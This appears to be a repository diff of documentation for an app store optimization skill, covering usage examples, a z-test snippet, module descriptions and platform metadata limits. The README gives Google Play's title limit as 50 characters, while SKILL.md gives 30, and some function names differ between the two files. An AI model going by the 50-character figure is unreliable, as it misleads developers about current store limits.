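# Two-proportion z-test for conversion A/B results (standard library only).
from math import sqrt, erf

def two_proportion_z(conv_a, n_a, conv_b, n_b):
    p_a, p_b = conv_a / n_a, conv_b / n_b
    pooled = (conv_a + conv_b) / (n_a + n_b)          # pooled conversion rate
    se = sqrt(pooled * (1 - pooled) * (1 / n_a + 1 / n_b))
    z = (p_b - p_a) / se
    # Two-tailed p-value via the normal CDF: Phi(x) = 0.5 * (1 + erf(x / sqrt(2)))
    p_value = 2 * (1 - 0.5 * (1 + erf(abs(z) / sqrt(2))))
    return z, p_value

# Example 10's numbers: 125/2500 (5%) vs 150/2500 (6%)
z, p = two_proportion_z(125, 2500, 150, 2500)
print(f"z = {z:.2f}, p = {p:.3f}")
```

For these numbers, z ≈ 1.55 and p ≈ 0.12, so the one-point lift is promising but not significant at the usual 0.05 threshold; the test would need a larger sample before implementing variant B with confidence.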

### Localization

**Example 11: Plan Localization Strategy**
```
Hey Claude—I just added the "app-store-optimization" skill. I currently only have English metadata. Which markets should I localize for first? I'm a bootstrapped startup with moderate budget.
```

**Example 12: Translate Metadata**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you help me translate my app metadata to Spanish for the Mexico market? Here's my English metadata: [paste metadata]. Check if it fits within character limits.
```

### Review Analysis

**Example 13: Analyze User Reviews**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze my recent reviews and tell me:
- Overall sentiment (positive/negative ratio)
- Most common complaints
- Most requested features
- Bugs that need immediate fixing
```

**Example 14: Generate Review Response Templates**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you create professional response templates for:
- Users reporting crashes
- Feature requests
- Positive 5-star reviews
- General complaints
```

### Launch Planning

**Example 15: Pre-Launch Checklist**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you generate a comprehensive pre-launch checklist for both Apple App Store and Google Play Store? My launch date is December 1, 2025.
```

**Example 16: Optimize Launch Timing**
```
Hey Claude—I just added the "app-store-optimization" skill. What's the best day and time to launch my fitness app? I want to maximize visibility and downloads in the first week.
```

**Example 17: Plan Seasonal Campaign**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you identify seasonal opportunities for my fitness app? It's currently October—what campaigns should I run for the next 6 months?
```

## What to Provide

### For Keyword Research
- App name and category
- Target audience description
- Key features and unique value proposition
- Competitor apps (optional)
- Geographic markets to target

### For Metadata Optimization
- Current app name
- Platform (Apple, Google, or both)
- Target keywords (prioritized list)
- Key features and benefits
- Target audience
- Current metadata (for optimization)

### For Competitor Analysis
- Your app category
- List of competitor app names or IDs
- Platform (Apple or Google)
- Specific aspects to analyze (keywords, visuals, ratings)

### For ASO Score Calculation
- Metadata quality metrics (title length, description length, keyword density)
- Rating data (average rating, total ratings, recent ratings)
- Keyword rankings (top 10, top 50, top 100 counts)
- Conversion metrics (impression-to-install rate, downloads)

### For A/B Testing
- Test type (icon, screenshot, title, description)
- Control variant details
- Test variant details
- Baseline conversion rate
- For results analysis: visitor and conversion counts for both variants

### For Localization
- Current market and language
- Budget level (low, medium, high)
- Target number of markets
- Current metadata text for translation

### For Review Analysis
- Recent reviews (text, rating, date)
- Platform (Apple or Google)
- Time period to analyze
- Specific focus (bugs, features, sentiment)

### For Launch Planning
- Platform (Apple, Google, or both)
- Target launch date
- App category
- App information (name, features, target audience)

## What You'll Get

### Keyword Research Output
- Prioritized keyword list with search volume estimates
- Competition level analysis
- Relevance scores
- Long-tail keyword opportunities
- Strategic recommendations

### Metadata Optimization Output
- Optimized titles (multiple options)
- Optimized descriptions (short and full)
- Keyword field optimization (Apple)
- Character count validation
- Keyword density analysis
- Before/after comparison

### Competitor Analysis Output
- Ranked competitors by ASO strength
- Common keyword patterns
- Keyword gaps and opportunities
- Visual asset assessment
- Best practices identified
- Actionable recommendations

### ASO Score Output
- Overall score (0-100)
- Breakdown by category (metadata, ratings, keywords, conversion)
- Strengths and weaknesses
- Prioritized action items
- Expected impact of improvements

### A/B Test Output
- Test design with hypothesis
- Required sample size calculation
- Duration estimates
- Statistical significance analysis
- Implementation recommendations
- Learnings and insights

### Localization Output
- Prioritized target markets
- Estimated translation costs
- ROI projections
- Character limit validation for each language
- Cultural adaptation recommendations
- Phased implementation plan

### Review Analysis Output
- Sentiment distribution (positive/neutral/negative)
- Common themes and topics
- Top issues requiring fixes
- Most requested features
- Response templates
- Trend analysis over time

### Launch Planning Output
- Platform-specific checklists (Apple, Google, Universal)
- Timeline with milestones
- Compliance validation
- Optimal launch timing recommendations
- Seasonal campaign opportunities
- Update cadence planning

## Tips for Best Results

1. **Be Specific**: Provide as much detail about your app as possible
2. **Include Context**: Share your goals (increase downloads, improve ranking, boost conversion)
3. **Provide Data**: Real metrics enable more accurate analysis
4. **Iterate**: Start with keyword research, then optimize metadata, then test
5. **Track Results**: Monitor changes after implementing recommendations
6. **Stay Compliant**: Always verify recommendations against current App Store/Play Store guidelines
7. **Test First**: Use A/B testing before making major metadata changes
8. **Localize Strategically**: Start with highest-ROI markets first
9. **Respond to Reviews**: Use provided templates to engage with users
10. **Plan Ahead**: Use launch checklists and timelines to avoid last-minute rushes

## Common Workflows

### New App Launch
1. Keyword research → Competitor analysis → Metadata optimization → Pre-launch checklist → Launch timing optimization

### Improving Existing App
1. ASO score calculation → Identify gaps → Metadata optimization → A/B testing → Review analysis → Implement changes

### International Expansion
1. Localization planning → Market prioritization → Metadata translation → ROI analysis → Phased rollout

### Ongoing Optimization
1. Monthly keyword ranking tracking → Quarterly metadata updates → Continuous A/B testing → Review monitoring → Seasonal campaigns

## Need Help?

If you need clarification on any aspect of ASO or want to combine multiple analyses, just ask! For example:

```
Hey Claude—I just added the "app-store-optimization" skill. Can you create a complete ASO strategy for my new productivity app? I need keyword research, optimized metadata for both stores, a pre-launch checklist, and launch timing recommendations.
```

The skill can handle comprehensive, multi-phase ASO projects as well as specific tactical optimizations.
430
skills/app-store-optimization/README.md
Normal file
@@ -0,0 +1,430 @@
# App Store Optimization (ASO) Skill

**Version**: 1.0.0
**Last Updated**: November 7, 2025
**Author**: Claude Skills Factory

## Overview

A comprehensive App Store Optimization (ASO) skill that provides complete capabilities for researching, optimizing, and tracking mobile app performance on the Apple App Store and Google Play Store. This skill empowers app developers and marketers to maximize their app's visibility, downloads, and success in competitive app marketplaces.

## What This Skill Does

This skill provides end-to-end ASO capabilities across seven key areas:

1. **Research & Analysis**: Keyword research, competitor analysis, market trends, review sentiment
2. **Metadata Optimization**: Title, description, keywords with platform-specific character limits
3. **Conversion Optimization**: A/B testing framework, visual asset optimization
4. **Rating & Review Management**: Sentiment analysis, response strategies, issue identification
5. **Launch & Update Strategies**: Pre-launch checklists, timing optimization, update planning
6. **Analytics & Tracking**: ASO scoring, keyword rankings, performance benchmarking
7. **Localization**: Multi-language strategy, translation management, ROI analysis

## Key Features

### Comprehensive Keyword Research
- Search volume and competition analysis
- Long-tail keyword discovery
- Competitor keyword extraction
- Keyword difficulty scoring
- Strategic prioritization

### Platform-Specific Metadata Optimization
- **Apple App Store**:
  - Title (30 chars)
  - Subtitle (30 chars)
  - Promotional Text (170 chars)
  - Description (4000 chars)
  - Keywords field (100 chars)
- **Google Play Store**:
  - Title (50 chars)
  - Short Description (80 chars)
  - Full Description (4000 chars)
- Character limit validation
- Keyword density analysis
- Multiple optimization strategies
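As a sketch of what limit validation involves, the platform limits listed above map directly to a lookup check. The field names and return shape here are illustrative, not the module's actual API:

```python
# Minimal character-limit check mirroring the limits in the list above.
LIMITS = {
    ("apple", "title"): 30,
    ("apple", "subtitle"): 30,
    ("apple", "promotional_text"): 170,
    ("apple", "description"): 4000,
    ("apple", "keywords"): 100,
    ("google", "title"): 50,
    ("google", "short_description"): 80,
    ("google", "full_description"): 4000,
}

def validate(platform, field, text):
    limit = LIMITS[(platform, field)]
    return {"length": len(text), "limit": limit, "ok": len(text) <= limit}

# "TaskFlow" here is a hypothetical app name used only for illustration.
print(validate("apple", "title", "TaskFlow: Tasks & Teamwork"))
```

Note that `len()` counts Unicode code points; some store consoles count characters slightly differently for emoji and combining marks, so validating against the console itself remains the final check.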

### Competitor Intelligence
- Automated competitor discovery
- Metadata strategy analysis
- Visual asset assessment
- Gap identification
- Competitive positioning

### ASO Health Scoring
- 0-100 overall score
- Four-category breakdown (Metadata, Ratings, Keywords, Conversion)
- Strengths and weaknesses identification
- Prioritized action recommendations
- Expected impact estimates

### Scientific A/B Testing
- Test design and hypothesis formulation
- Sample size calculation
- Statistical significance analysis
- Duration estimation
- Implementation recommendations

### Global Localization
- Market prioritization (Tier 1/2/3)
- Translation cost estimation
- Character limit adaptation by language
- Cultural keyword considerations
- ROI analysis

### Review Intelligence
- Sentiment analysis
- Common theme extraction
- Bug and issue identification
- Feature request clustering
- Professional response templates

### Launch Planning
- Platform-specific checklists
- Timeline generation
- Compliance validation
- Optimal timing recommendations
- Seasonal campaign planning

## Python Modules

This skill includes 8 powerful Python modules:

### 1. keyword_analyzer.py
**Purpose**: Analyzes keywords for search volume, competition, and relevance

**Key Functions**:
- `analyze_keyword()`: Single keyword analysis
- `compare_keywords()`: Multi-keyword comparison and ranking
- `find_long_tail_opportunities()`: Generate long-tail variations
- `calculate_keyword_density()`: Analyze keyword usage in text
- `extract_keywords_from_text()`: Extract keywords from reviews/descriptions
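Keyword density, as computed by a function like `calculate_keyword_density()`, is essentially occurrences of the (possibly multi-word) phrase divided by total words. A minimal sketch, where the tokenization rule is an assumption rather than the module's exact behavior:

```python
# Keyword density sketch: phrase occurrences over total word count.
import re

def keyword_density(text, keyword):
    # Lowercase word tokens; apostrophes kept so "don't" stays one word.
    words = re.findall(r"[a-z0-9']+", text.lower())
    kw = keyword.lower().split()
    # Slide a window of len(kw) over the token list and count exact matches.
    hits = sum(1 for i in range(len(words) - len(kw) + 1) if words[i:i + len(kw)] == kw)
    return hits / max(len(words), 1)

text = "TaskFlow is a task manager for teams. The best task manager keeps tasks simple."
print(round(keyword_density(text, "task manager"), 3))  # → 0.143 (2 hits / 14 words)
```

Densities in roughly the 1-3% range are commonly cited as natural for a description; far above that starts to read as keyword stuffing, which both stores discourage.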

### 2. metadata_optimizer.py
**Purpose**: Optimizes titles, descriptions, keywords with character limit validation

**Key Functions**:
- `optimize_title()`: Generate optimal title options
- `optimize_description()`: Create conversion-focused descriptions
- `optimize_keyword_field()`: Maximize Apple's 100-char keyword field
- `validate_character_limits()`: Ensure platform compliance
- `calculate_keyword_density()`: Analyze keyword integration

### 3. competitor_analyzer.py
**Purpose**: Analyzes competitor ASO strategies

**Key Functions**:
- `analyze_competitor()`: Single competitor deep-dive
- `compare_competitors()`: Multi-competitor analysis
- `identify_gaps()`: Find competitive opportunities
- `_calculate_competitive_strength()`: Score competitor ASO quality

### 4. aso_scorer.py
**Purpose**: Calculates comprehensive ASO health score

**Key Functions**:
- `calculate_overall_score()`: 0-100 ASO health score
- `score_metadata_quality()`: Evaluate metadata optimization
- `score_ratings_reviews()`: Assess rating quality and volume
- `score_keyword_performance()`: Analyze ranking positions
- `score_conversion_metrics()`: Evaluate conversion rates
- `generate_recommendations()`: Prioritized improvement actions

### 5. ab_test_planner.py
**Purpose**: Plans and tracks A/B tests for ASO elements

**Key Functions**:
- `design_test()`: Create test hypothesis and structure
- `calculate_sample_size()`: Determine required visitors
- `calculate_significance()`: Assess statistical validity
- `track_test_results()`: Monitor ongoing tests
- `generate_test_report()`: Create comprehensive test reports
|
||||||
|
|
||||||
|
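Sample-size math for conversion-rate tests follows the standard two-proportion formula. A sketch using z = 1.96 (95% confidence) and z = 0.84 (80% power); the module's actual `calculate_sample_size()` may use different defaults:

```python
import math

# Standard two-proportion sample-size formula, per variant.
def calculate_sample_size(baseline_rate, min_detectable_effect,
                          z_alpha=1.96, z_beta=0.84):
    """min_detectable_effect is relative, e.g. 0.15 for a 15% lift."""
    p1 = baseline_rate
    p2 = baseline_rate * (1 + min_detectable_effect)
    p_bar = (p1 + p2) / 2
    numerator = (z_alpha * math.sqrt(2 * p_bar * (1 - p_bar))
                 + z_beta * math.sqrt(p1 * (1 - p1) + p2 * (1 - p2))) ** 2
    return math.ceil(numerator / (p2 - p1) ** 2)

# 4.2% baseline conversion, detect a 15% relative lift:
print(calculate_sample_size(0.042, 0.15))  # roughly 17,000 visitors per variant
```

Note how quickly the requirement drops for larger effects — this is why low-traffic apps should test high-impact elements (like the icon) first.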
### 6. localization_helper.py

**Purpose**: Manages multi-language ASO optimization

**Key Functions**:
- `identify_target_markets()`: Prioritize localization markets
- `translate_metadata()`: Adapt metadata for languages
- `adapt_keywords()`: Cultural keyword adaptation
- `validate_translations()`: Character limit validation
- `calculate_localization_roi()`: Estimate investment returns

### 7. review_analyzer.py

**Purpose**: Analyzes user reviews for actionable insights

**Key Functions**:
- `analyze_sentiment()`: Calculate sentiment distribution
- `extract_common_themes()`: Identify frequent topics
- `identify_issues()`: Surface bugs and problems
- `find_feature_requests()`: Extract desired features
- `track_sentiment_trends()`: Monitor changes over time
- `generate_response_templates()`: Create review responses

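A toy version of the sentiment distribution can be derived from star ratings alone. This sketch shows only the output shape; the real `analyze_sentiment()` presumably analyzes review text as well:

```python
# Toy sketch: map star ratings to sentiment buckets.
def analyze_sentiment(reviews):
    """reviews: list of dicts with a 'rating' key (1-5 stars)."""
    dist = {"positive": 0, "neutral": 0, "negative": 0}
    for r in reviews:
        if r["rating"] >= 4:
            dist["positive"] += 1
        elif r["rating"] == 3:
            dist["neutral"] += 1
        else:
            dist["negative"] += 1
    total = len(reviews) or 1  # avoid division by zero on empty input
    return {k: v / total for k, v in dist.items()}

print(analyze_sentiment([{"rating": 5}, {"rating": 3}, {"rating": 1}, {"rating": 4}]))
```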
### 8. launch_checklist.py

**Purpose**: Generates comprehensive launch and update checklists

**Key Functions**:
- `generate_prelaunch_checklist()`: Complete submission validation
- `validate_app_store_compliance()`: Check guidelines compliance
- `create_update_plan()`: Plan update cadence
- `optimize_launch_timing()`: Recommend launch dates
- `plan_seasonal_campaigns()`: Identify seasonal opportunities

## Installation

### For Claude Code (Desktop/CLI)

#### Project-Level Installation
```bash
# Copy the skill folder into your project
cp -r app-store-optimization /path/to/your/project/.claude/skills/

# Claude will auto-load the skill when working in this project
```

#### User-Level Installation (Available in All Projects)
```bash
# Copy the skill folder to your user-level skills directory
cp -r app-store-optimization ~/.claude/skills/

# Claude will load this skill in all your projects
```

### For Claude Apps (Browser)

1. Use the `skill-creator` skill to import the skill
2. Or import it manually via the Claude Apps interface

### Verification

To verify installation:
```bash
# Check that the skill folder exists
ls ~/.claude/skills/app-store-optimization/

# You should see:
# SKILL.md
# keyword_analyzer.py
# metadata_optimizer.py
# competitor_analyzer.py
# aso_scorer.py
# ab_test_planner.py
# localization_helper.py
# review_analyzer.py
# launch_checklist.py
# sample_input.json
# expected_output.json
# HOW_TO_USE.md
# README.md
```

## Usage Examples

### Example 1: Complete Keyword Research

```
Hey Claude—I just added the "app-store-optimization" skill. Can you research keywords for my fitness app? I'm targeting people who want home workouts, yoga, and meal planning. Analyze top competitors like Nike Training Club and Peloton.
```

**What Claude will do**:
- Use `keyword_analyzer.py` to research keywords
- Use `competitor_analyzer.py` to analyze Nike Training Club and Peloton
- Provide a prioritized keyword list with search volumes and competition levels
- Identify gaps and long-tail opportunities
- Recommend primary keywords for the title and secondary keywords for the description

### Example 2: Optimize App Store Metadata

```
Hey Claude—I just added the "app-store-optimization" skill. Optimize my app's metadata for both Apple App Store and Google Play Store:
- App: FitFlow
- Category: Health & Fitness
- Features: AI workout plans, nutrition tracking, progress photos
- Keywords: fitness app, workout planner, home fitness
```

**What Claude will do**:
- Use `metadata_optimizer.py` to create optimized titles (multiple options)
- Generate platform-specific descriptions (short and full)
- Optimize Apple's 100-character keyword field
- Validate all character limits
- Calculate keyword density
- Provide a before/after comparison

### Example 3: Calculate ASO Health Score

```
Hey Claude—I just added the "app-store-optimization" skill. Calculate my app's ASO score:
- Average rating: 4.3 stars (8,200 ratings)
- Keywords in top 10: 4
- Keywords in top 50: 15
- Conversion rate: 3.8%
- Title: "FitFlow - Home Workouts"
- Description: 1,500 characters with 3 keyword mentions
```

**What Claude will do**:
- Use `aso_scorer.py` to calculate the overall score (0-100)
- Break the score down by category (Metadata: X/25, Ratings: X/25, Keywords: X/25, Conversion: X/25)
- Identify strengths and weaknesses
- Generate prioritized recommendations
- Estimate the impact of improvements

### Example 4: A/B Test Planning

```
Hey Claude—I just added the "app-store-optimization" skill. I want to A/B test my app icon. My current conversion rate is 4.2%. How many visitors do I need and how long should I run the test?
```

**What Claude will do**:
- Use `ab_test_planner.py` to design the test
- Calculate the required sample size (based on the minimum detectable effect)
- Estimate test duration for low/medium/high traffic scenarios
- Provide the test structure and success metrics
- Explain how to analyze the results

### Example 5: Review Sentiment Analysis

```
Hey Claude—I just added the "app-store-optimization" skill. Analyze my last 500 reviews and tell me:
- Overall sentiment
- Most common complaints
- Top feature requests
- Bugs needing immediate fixes
```

**What Claude will do**:
- Use `review_analyzer.py` to process the reviews
- Calculate the sentiment distribution
- Extract common themes
- Identify and prioritize issues
- Cluster feature requests
- Generate response templates

### Example 6: Pre-Launch Checklist

```
Hey Claude—I just added the "app-store-optimization" skill. Generate a complete pre-launch checklist for both app stores. My launch date is March 15, 2026.
```

**What Claude will do**:
- Use `launch_checklist.py` to generate the checklists
- Create an Apple App Store checklist (metadata, assets, technical, legal)
- Create a Google Play Store checklist (metadata, assets, technical, legal)
- Add a universal checklist (marketing, QA, support)
- Generate a timeline with milestones
- Calculate the completion percentage

## Best Practices

### Keyword Research
1. Start with 20-30 seed keywords
2. Analyze the top 5 competitors in your category
3. Balance high-volume and long-tail keywords
4. Prioritize relevance over search volume
5. Update keyword research quarterly

### Metadata Optimization
1. Front-load keywords in the title (the first 15 characters matter most)
2. Use every available character (don't waste space)
3. Write for humans first, search engines second
4. A/B test major changes before committing
5. Update descriptions with each major release

### A/B Testing
1. Test one element at a time (icon vs. screenshots vs. title)
2. Run tests to statistical significance (90%+ confidence)
3. Test high-impact elements first (the icon has the biggest impact)
4. Allow sufficient duration (at least 1 week, preferably 2-3)
5. Document learnings for future tests

### Localization
1. Start with the top 5 revenue markets (US, China, Japan, Germany, UK)
2. Use professional translators, not machine translation
3. Test translations with native speakers
4. Adapt keywords for cultural context
5. Monitor ROI by market

### Review Management
1. Respond to reviews within 24-48 hours
2. Always be professional, even with negative reviews
3. Address the specific issues raised
4. Thank users for positive feedback
5. Use insights to prioritize product improvements

## Technical Requirements

- **Python**: 3.7+ (for the Python modules)
- **Platform Support**: Apple App Store, Google Play Store
- **Data Formats**: JSON input/output
- **Dependencies**: Standard library only (no external packages required)

## Limitations

### Data Dependencies
- Keyword search volumes are estimates (no official Apple/Google data)
- Competitor data is limited to publicly available information
- Review analysis requires access to public reviews
- Historical data may not be available for new apps

### Platform Constraints
- Apple: Metadata changes require an app submission (except Promotional Text)
- Google: Metadata changes take 1-2 hours to index
- A/B testing requires significant traffic to reach statistical significance
- Store algorithms are proprietary and change without notice

### Scope
- Does not include paid user acquisition (Apple Search Ads, Google Ads)
- Does not cover in-app analytics implementation
- Does not handle technical app development
- Focuses on organic discovery and conversion optimization

## Troubleshooting

### Issue: Python modules not found
**Solution**: Ensure all `.py` files are in the same directory as SKILL.md.

### Issue: Character limit validation failing
**Solution**: Check that you're passing the correct platform value ('apple' or 'google').

### Issue: Keyword research returning limited results
**Solution**: Provide more context about your app, its features, and your target audience.

### Issue: ASO score seems inaccurate
**Solution**: Ensure you're providing accurate metrics (ratings, keyword rankings, conversion rate).

## Version History

### Version 1.0.0 (November 7, 2025)
- Initial release
- 8 Python modules with comprehensive ASO capabilities
- Support for both Apple App Store and Google Play Store
- Keyword research, metadata optimization, competitor analysis
- ASO scoring, A/B testing, localization, review analysis
- Launch planning and seasonal campaign tools

## Support & Feedback

This skill is designed to help app developers and marketers succeed in competitive app marketplaces. For the best results:

1. Provide detailed context about your app
2. Include specific metrics when available
3. Ask follow-up questions for clarification
4. Iterate based on results

## Credits

Developed by Claude Skills Factory.
Based on industry-standard ASO best practices.
Platform requirements current as of November 2025.

## License

This skill is provided as-is for use with Claude Code and Claude Apps. Customize and extend as needed for your specific use cases.

---

**Ready to optimize your app?** Start with keyword research, then move to metadata optimization, and finally implement A/B testing for continuous improvement. The skill handles everything from pre-launch planning to ongoing optimization.

For detailed usage examples, see [HOW_TO_USE.md](HOW_TO_USE.md).
403
skills/app-store-optimization/SKILL.md
Normal file
@@ -0,0 +1,403 @@
---
name: app-store-optimization
description: Complete App Store Optimization (ASO) toolkit for researching, optimizing, and tracking mobile app performance on Apple App Store and Google Play Store
---

# App Store Optimization (ASO) Skill

This comprehensive skill provides complete ASO capabilities for successfully launching and optimizing mobile applications on the Apple App Store and Google Play Store.

## Capabilities

### Research & Analysis
- **Keyword Research**: Analyze keyword volume, competition, and relevance for app discovery
- **Competitor Analysis**: Deep-dive into top-performing apps in your category
- **Market Trend Analysis**: Identify emerging trends and opportunities in your app category
- **Review Sentiment Analysis**: Extract insights from user reviews to identify strengths and issues
- **Category Analysis**: Evaluate optimal category and subcategory placement strategies

### Metadata Optimization
- **Title Optimization**: Create compelling titles with optimal keyword placement (platform-specific character limits)
- **Description Optimization**: Craft both short and full descriptions that convert and rank
- **Subtitle/Promotional Text**: Optimize Apple-specific subtitle (30 chars) and promotional text (170 chars)
- **Keyword Field**: Maximize Apple's 100-character keyword field with strategic selection
- **Category Selection**: Data-driven recommendations for primary and secondary categories
- **Icon Best Practices**: Guidelines for designing high-converting app icons
- **Screenshot Optimization**: Strategies for creating screenshots that drive installs
- **Preview Video**: Best practices for app preview videos
- **Localization**: Multi-language optimization strategies for global reach

### Conversion Optimization
- **A/B Testing Framework**: Plan and track metadata experiments for continuous improvement
- **Visual Asset Testing**: Test icons, screenshots, and videos for maximum conversion
- **Store Listing Optimization**: Comprehensive page optimization for impression-to-install conversion
- **Call-to-Action**: Optimize CTAs in descriptions and promotional materials

### Rating & Review Management
- **Review Monitoring**: Track and analyze user reviews for actionable insights
- **Response Strategies**: Templates and best practices for responding to reviews
- **Rating Improvement**: Tactical approaches to improve app ratings organically
- **Issue Identification**: Surface common problems and feature requests from reviews

### Launch & Update Strategies
- **Pre-Launch Checklist**: Complete validation before submitting to stores
- **Launch Timing**: Optimize release timing for maximum visibility and downloads
- **Update Cadence**: Plan optimal update frequency and feature rollouts
- **Feature Announcements**: Craft "What's New" sections that re-engage users
- **Seasonal Optimization**: Leverage seasonal trends and events

### Analytics & Tracking
- **ASO Score**: Calculate an overall ASO health score across multiple factors
- **Keyword Rankings**: Track keyword position changes over time
- **Conversion Metrics**: Monitor impression-to-install conversion rates
- **Download Velocity**: Track download trends and momentum
- **Performance Benchmarking**: Compare against category averages and competitors

### Platform-Specific Requirements
- **Apple App Store**:
  - Title: 30 characters
  - Subtitle: 30 characters
  - Promotional Text: 170 characters (editable without an app update)
  - Description: 4,000 characters
  - Keywords: 100 characters (comma-separated, no spaces)
  - What's New: 4,000 characters
- **Google Play Store**:
  - Title: 30 characters (reduced from 50 in 2021)
  - Short Description: 80 characters
  - Full Description: 4,000 characters
  - No separate keyword field (keywords are extracted from the title and description)

## Input Requirements

### Keyword Research
```json
{
  "app_name": "MyApp",
  "category": "Productivity",
  "target_keywords": ["task manager", "productivity", "todo list"],
  "competitors": ["Todoist", "Any.do", "Microsoft To Do"],
  "language": "en-US"
}
```

### Metadata Optimization
```json
{
  "platform": "apple" | "google",
  "app_info": {
    "name": "MyApp",
    "category": "Productivity",
    "target_audience": "Professionals aged 25-45",
    "key_features": ["Task management", "Team collaboration", "AI assistance"],
    "unique_value": "AI-powered task prioritization"
  },
  "current_metadata": {
    "title": "Current Title",
    "subtitle": "Current Subtitle",
    "description": "Current description..."
  },
  "target_keywords": ["productivity", "task manager", "todo"]
}
```

### Review Analysis
```json
{
  "app_id": "com.myapp.app",
  "platform": "apple" | "google",
  "date_range": "last_30_days" | "last_90_days" | "all_time",
  "rating_filter": [1, 2, 3, 4, 5],
  "language": "en"
}
```

### ASO Score Calculation
```json
{
  "metadata": {
    "title_quality": 0.8,
    "description_quality": 0.7,
    "keyword_density": 0.6
  },
  "ratings": {
    "average_rating": 4.5,
    "total_ratings": 15000
  },
  "conversion": {
    "impression_to_install": 0.05
  },
  "keyword_rankings": {
    "top_10": 5,
    "top_50": 12,
    "top_100": 18
  }
}
```

## Output Formats

### Keyword Research Report
- List of recommended keywords with search volume estimates
- Competition level analysis (low/medium/high)
- Relevance scores for each keyword
- Strategic recommendations for primary vs. secondary keywords
- Long-tail keyword opportunities

### Optimized Metadata Package
- Platform-specific title (with character count validation)
- Subtitle/promotional text (Apple)
- Short description (Google)
- Full description (both platforms)
- Keyword field (Apple, 100 chars)
- Character count validation for all fields
- Keyword density analysis
- Before/after comparison

### Competitor Analysis Report
- Top 10 competitors in the category
- Their metadata strategies
- Keyword overlap analysis
- Visual asset assessment
- Rating and review volume comparison
- Identified gaps and opportunities

### ASO Health Score
- Overall score (0-100)
- Category breakdown:
  - Metadata Quality (0-25)
  - Ratings & Reviews (0-25)
  - Keyword Performance (0-25)
  - Conversion Metrics (0-25)
- Specific improvement recommendations
- Priority action items

### A/B Test Plan
- Hypothesis and test variables
- Test duration recommendations
- Success metrics definition
- Sample size calculations
- Statistical significance thresholds

### Launch Checklist
- Pre-submission validation (all required assets and metadata)
- Store compliance verification
- Testing checklist (devices, OS versions)
- Marketing preparation items
- Post-launch monitoring plan

## How to Use

### Keyword Research
```
Hey Claude—I just added the "app-store-optimization" skill. Can you research the best keywords for a productivity app targeting professionals? Focus on keywords with good search volume but lower competition.
```

### Optimize App Store Listing
```
Hey Claude—I just added the "app-store-optimization" skill. Can you optimize my app's metadata for the Apple App Store? Here's my current listing: [provide current metadata]. I want to rank for "task management" and "productivity tools".
```

### Analyze Competitor Strategy
```
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze the ASO strategies of Todoist, Any.do, and Microsoft To Do? I want to understand what they're doing well and where there are opportunities.
```

### Review Sentiment Analysis
```
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze recent reviews for my app (com.myapp.ios) and identify the most common user complaints and feature requests?
```

### Calculate ASO Score
```
Hey Claude—I just added the "app-store-optimization" skill. Can you calculate my app's overall ASO health score and provide specific recommendations for improvement?
```

### Plan A/B Test
```
Hey Claude—I just added the "app-store-optimization" skill. I want to A/B test my app icon and first screenshot. Can you help me design the test and determine how long to run it?
```

### Pre-Launch Checklist
```
Hey Claude—I just added the "app-store-optimization" skill. Can you generate a comprehensive pre-launch checklist for submitting my app to both Apple App Store and Google Play Store?
```

## Scripts

### keyword_analyzer.py
Analyzes keywords for search volume, competition, and relevance. Provides strategic recommendations for primary and secondary keywords.

**Key Functions:**
- `analyze_keyword()`: Analyze single keyword metrics
- `compare_keywords()`: Compare multiple keywords
- `find_long_tail()`: Discover long-tail keyword opportunities
- `calculate_keyword_difficulty()`: Assess competition level

### metadata_optimizer.py
Optimizes titles, descriptions, and keyword fields with platform-specific character limit validation.

**Key Functions:**
- `optimize_title()`: Create compelling, keyword-rich titles
- `optimize_description()`: Generate conversion-focused descriptions
- `optimize_keyword_field()`: Maximize Apple's 100-char keyword field
- `validate_character_limits()`: Ensure compliance with platform limits
- `calculate_keyword_density()`: Analyze keyword usage in metadata

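Keyword density has a common definition: the share of words in a text accounted for by keyword matches. A sketch of that calculation — the module's exact weighting is an assumption:

```python
import re

# Sketch: fraction of words covered by exact keyword-phrase matches.
def calculate_keyword_density(text, keyword):
    words = re.findall(r"[a-z']+", text.lower())
    if not words:
        return 0.0
    kw_words = keyword.lower().split()
    n = len(kw_words)
    # Count non-overlapping-by-position phrase matches via a sliding window.
    hits = sum(1 for i in range(len(words) - n + 1) if words[i:i + n] == kw_words)
    return hits * n / len(words)

density = calculate_keyword_density(
    "FitFlow is a fitness app. The best fitness app for home workouts.",
    "fitness app")
print(round(density, 3))  # 0.333 — 2 two-word matches out of 12 words
```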
### competitor_analyzer.py
Analyzes top competitors' ASO strategies and identifies opportunities.

**Key Functions:**
- `get_top_competitors()`: Identify category leaders
- `analyze_competitor_metadata()`: Extract and analyze competitor keywords
- `compare_visual_assets()`: Evaluate icons and screenshots
- `identify_gaps()`: Find competitive opportunities

### aso_scorer.py
Calculates a comprehensive ASO health score across multiple dimensions.

**Key Functions:**
- `calculate_overall_score()`: Compute a 0-100 ASO score
- `score_metadata_quality()`: Evaluate title, description, and keywords
- `score_ratings_reviews()`: Assess rating quality and volume
- `score_keyword_performance()`: Analyze ranking positions
- `score_conversion_metrics()`: Evaluate impression-to-install rates
- `generate_recommendations()`: Provide prioritized action items

### ab_test_planner.py
Plans and tracks A/B tests for metadata and visual assets.

**Key Functions:**
- `design_test()`: Create test hypothesis and variables
- `calculate_sample_size()`: Determine the required sample size and test duration
- `calculate_significance()`: Assess statistical significance
- `track_results()`: Monitor test performance
- `generate_report()`: Summarize test outcomes

### localization_helper.py
Manages multi-language ASO optimization strategies.

**Key Functions:**
- `identify_target_markets()`: Recommend localization priorities
- `translate_metadata()`: Generate localized metadata
- `adapt_keywords()`: Research locale-specific keywords
- `validate_translations()`: Check character limits per language
- `calculate_localization_roi()`: Estimate the impact of localization

### review_analyzer.py
Analyzes user reviews for sentiment, issues, and feature requests.

**Key Functions:**
- `analyze_sentiment()`: Calculate positive/negative/neutral ratios
- `extract_common_themes()`: Identify frequently mentioned topics
- `identify_issues()`: Surface bugs and user complaints
- `find_feature_requests()`: Extract desired features
- `track_sentiment_trends()`: Monitor sentiment over time
- `generate_response_templates()`: Create review response drafts

### launch_checklist.py
Generates comprehensive pre-launch and update checklists.

**Key Functions:**
- `generate_prelaunch_checklist()`: Complete submission validation
- `validate_app_store_compliance()`: Check Apple guidelines
- `validate_play_store_compliance()`: Check Google policies
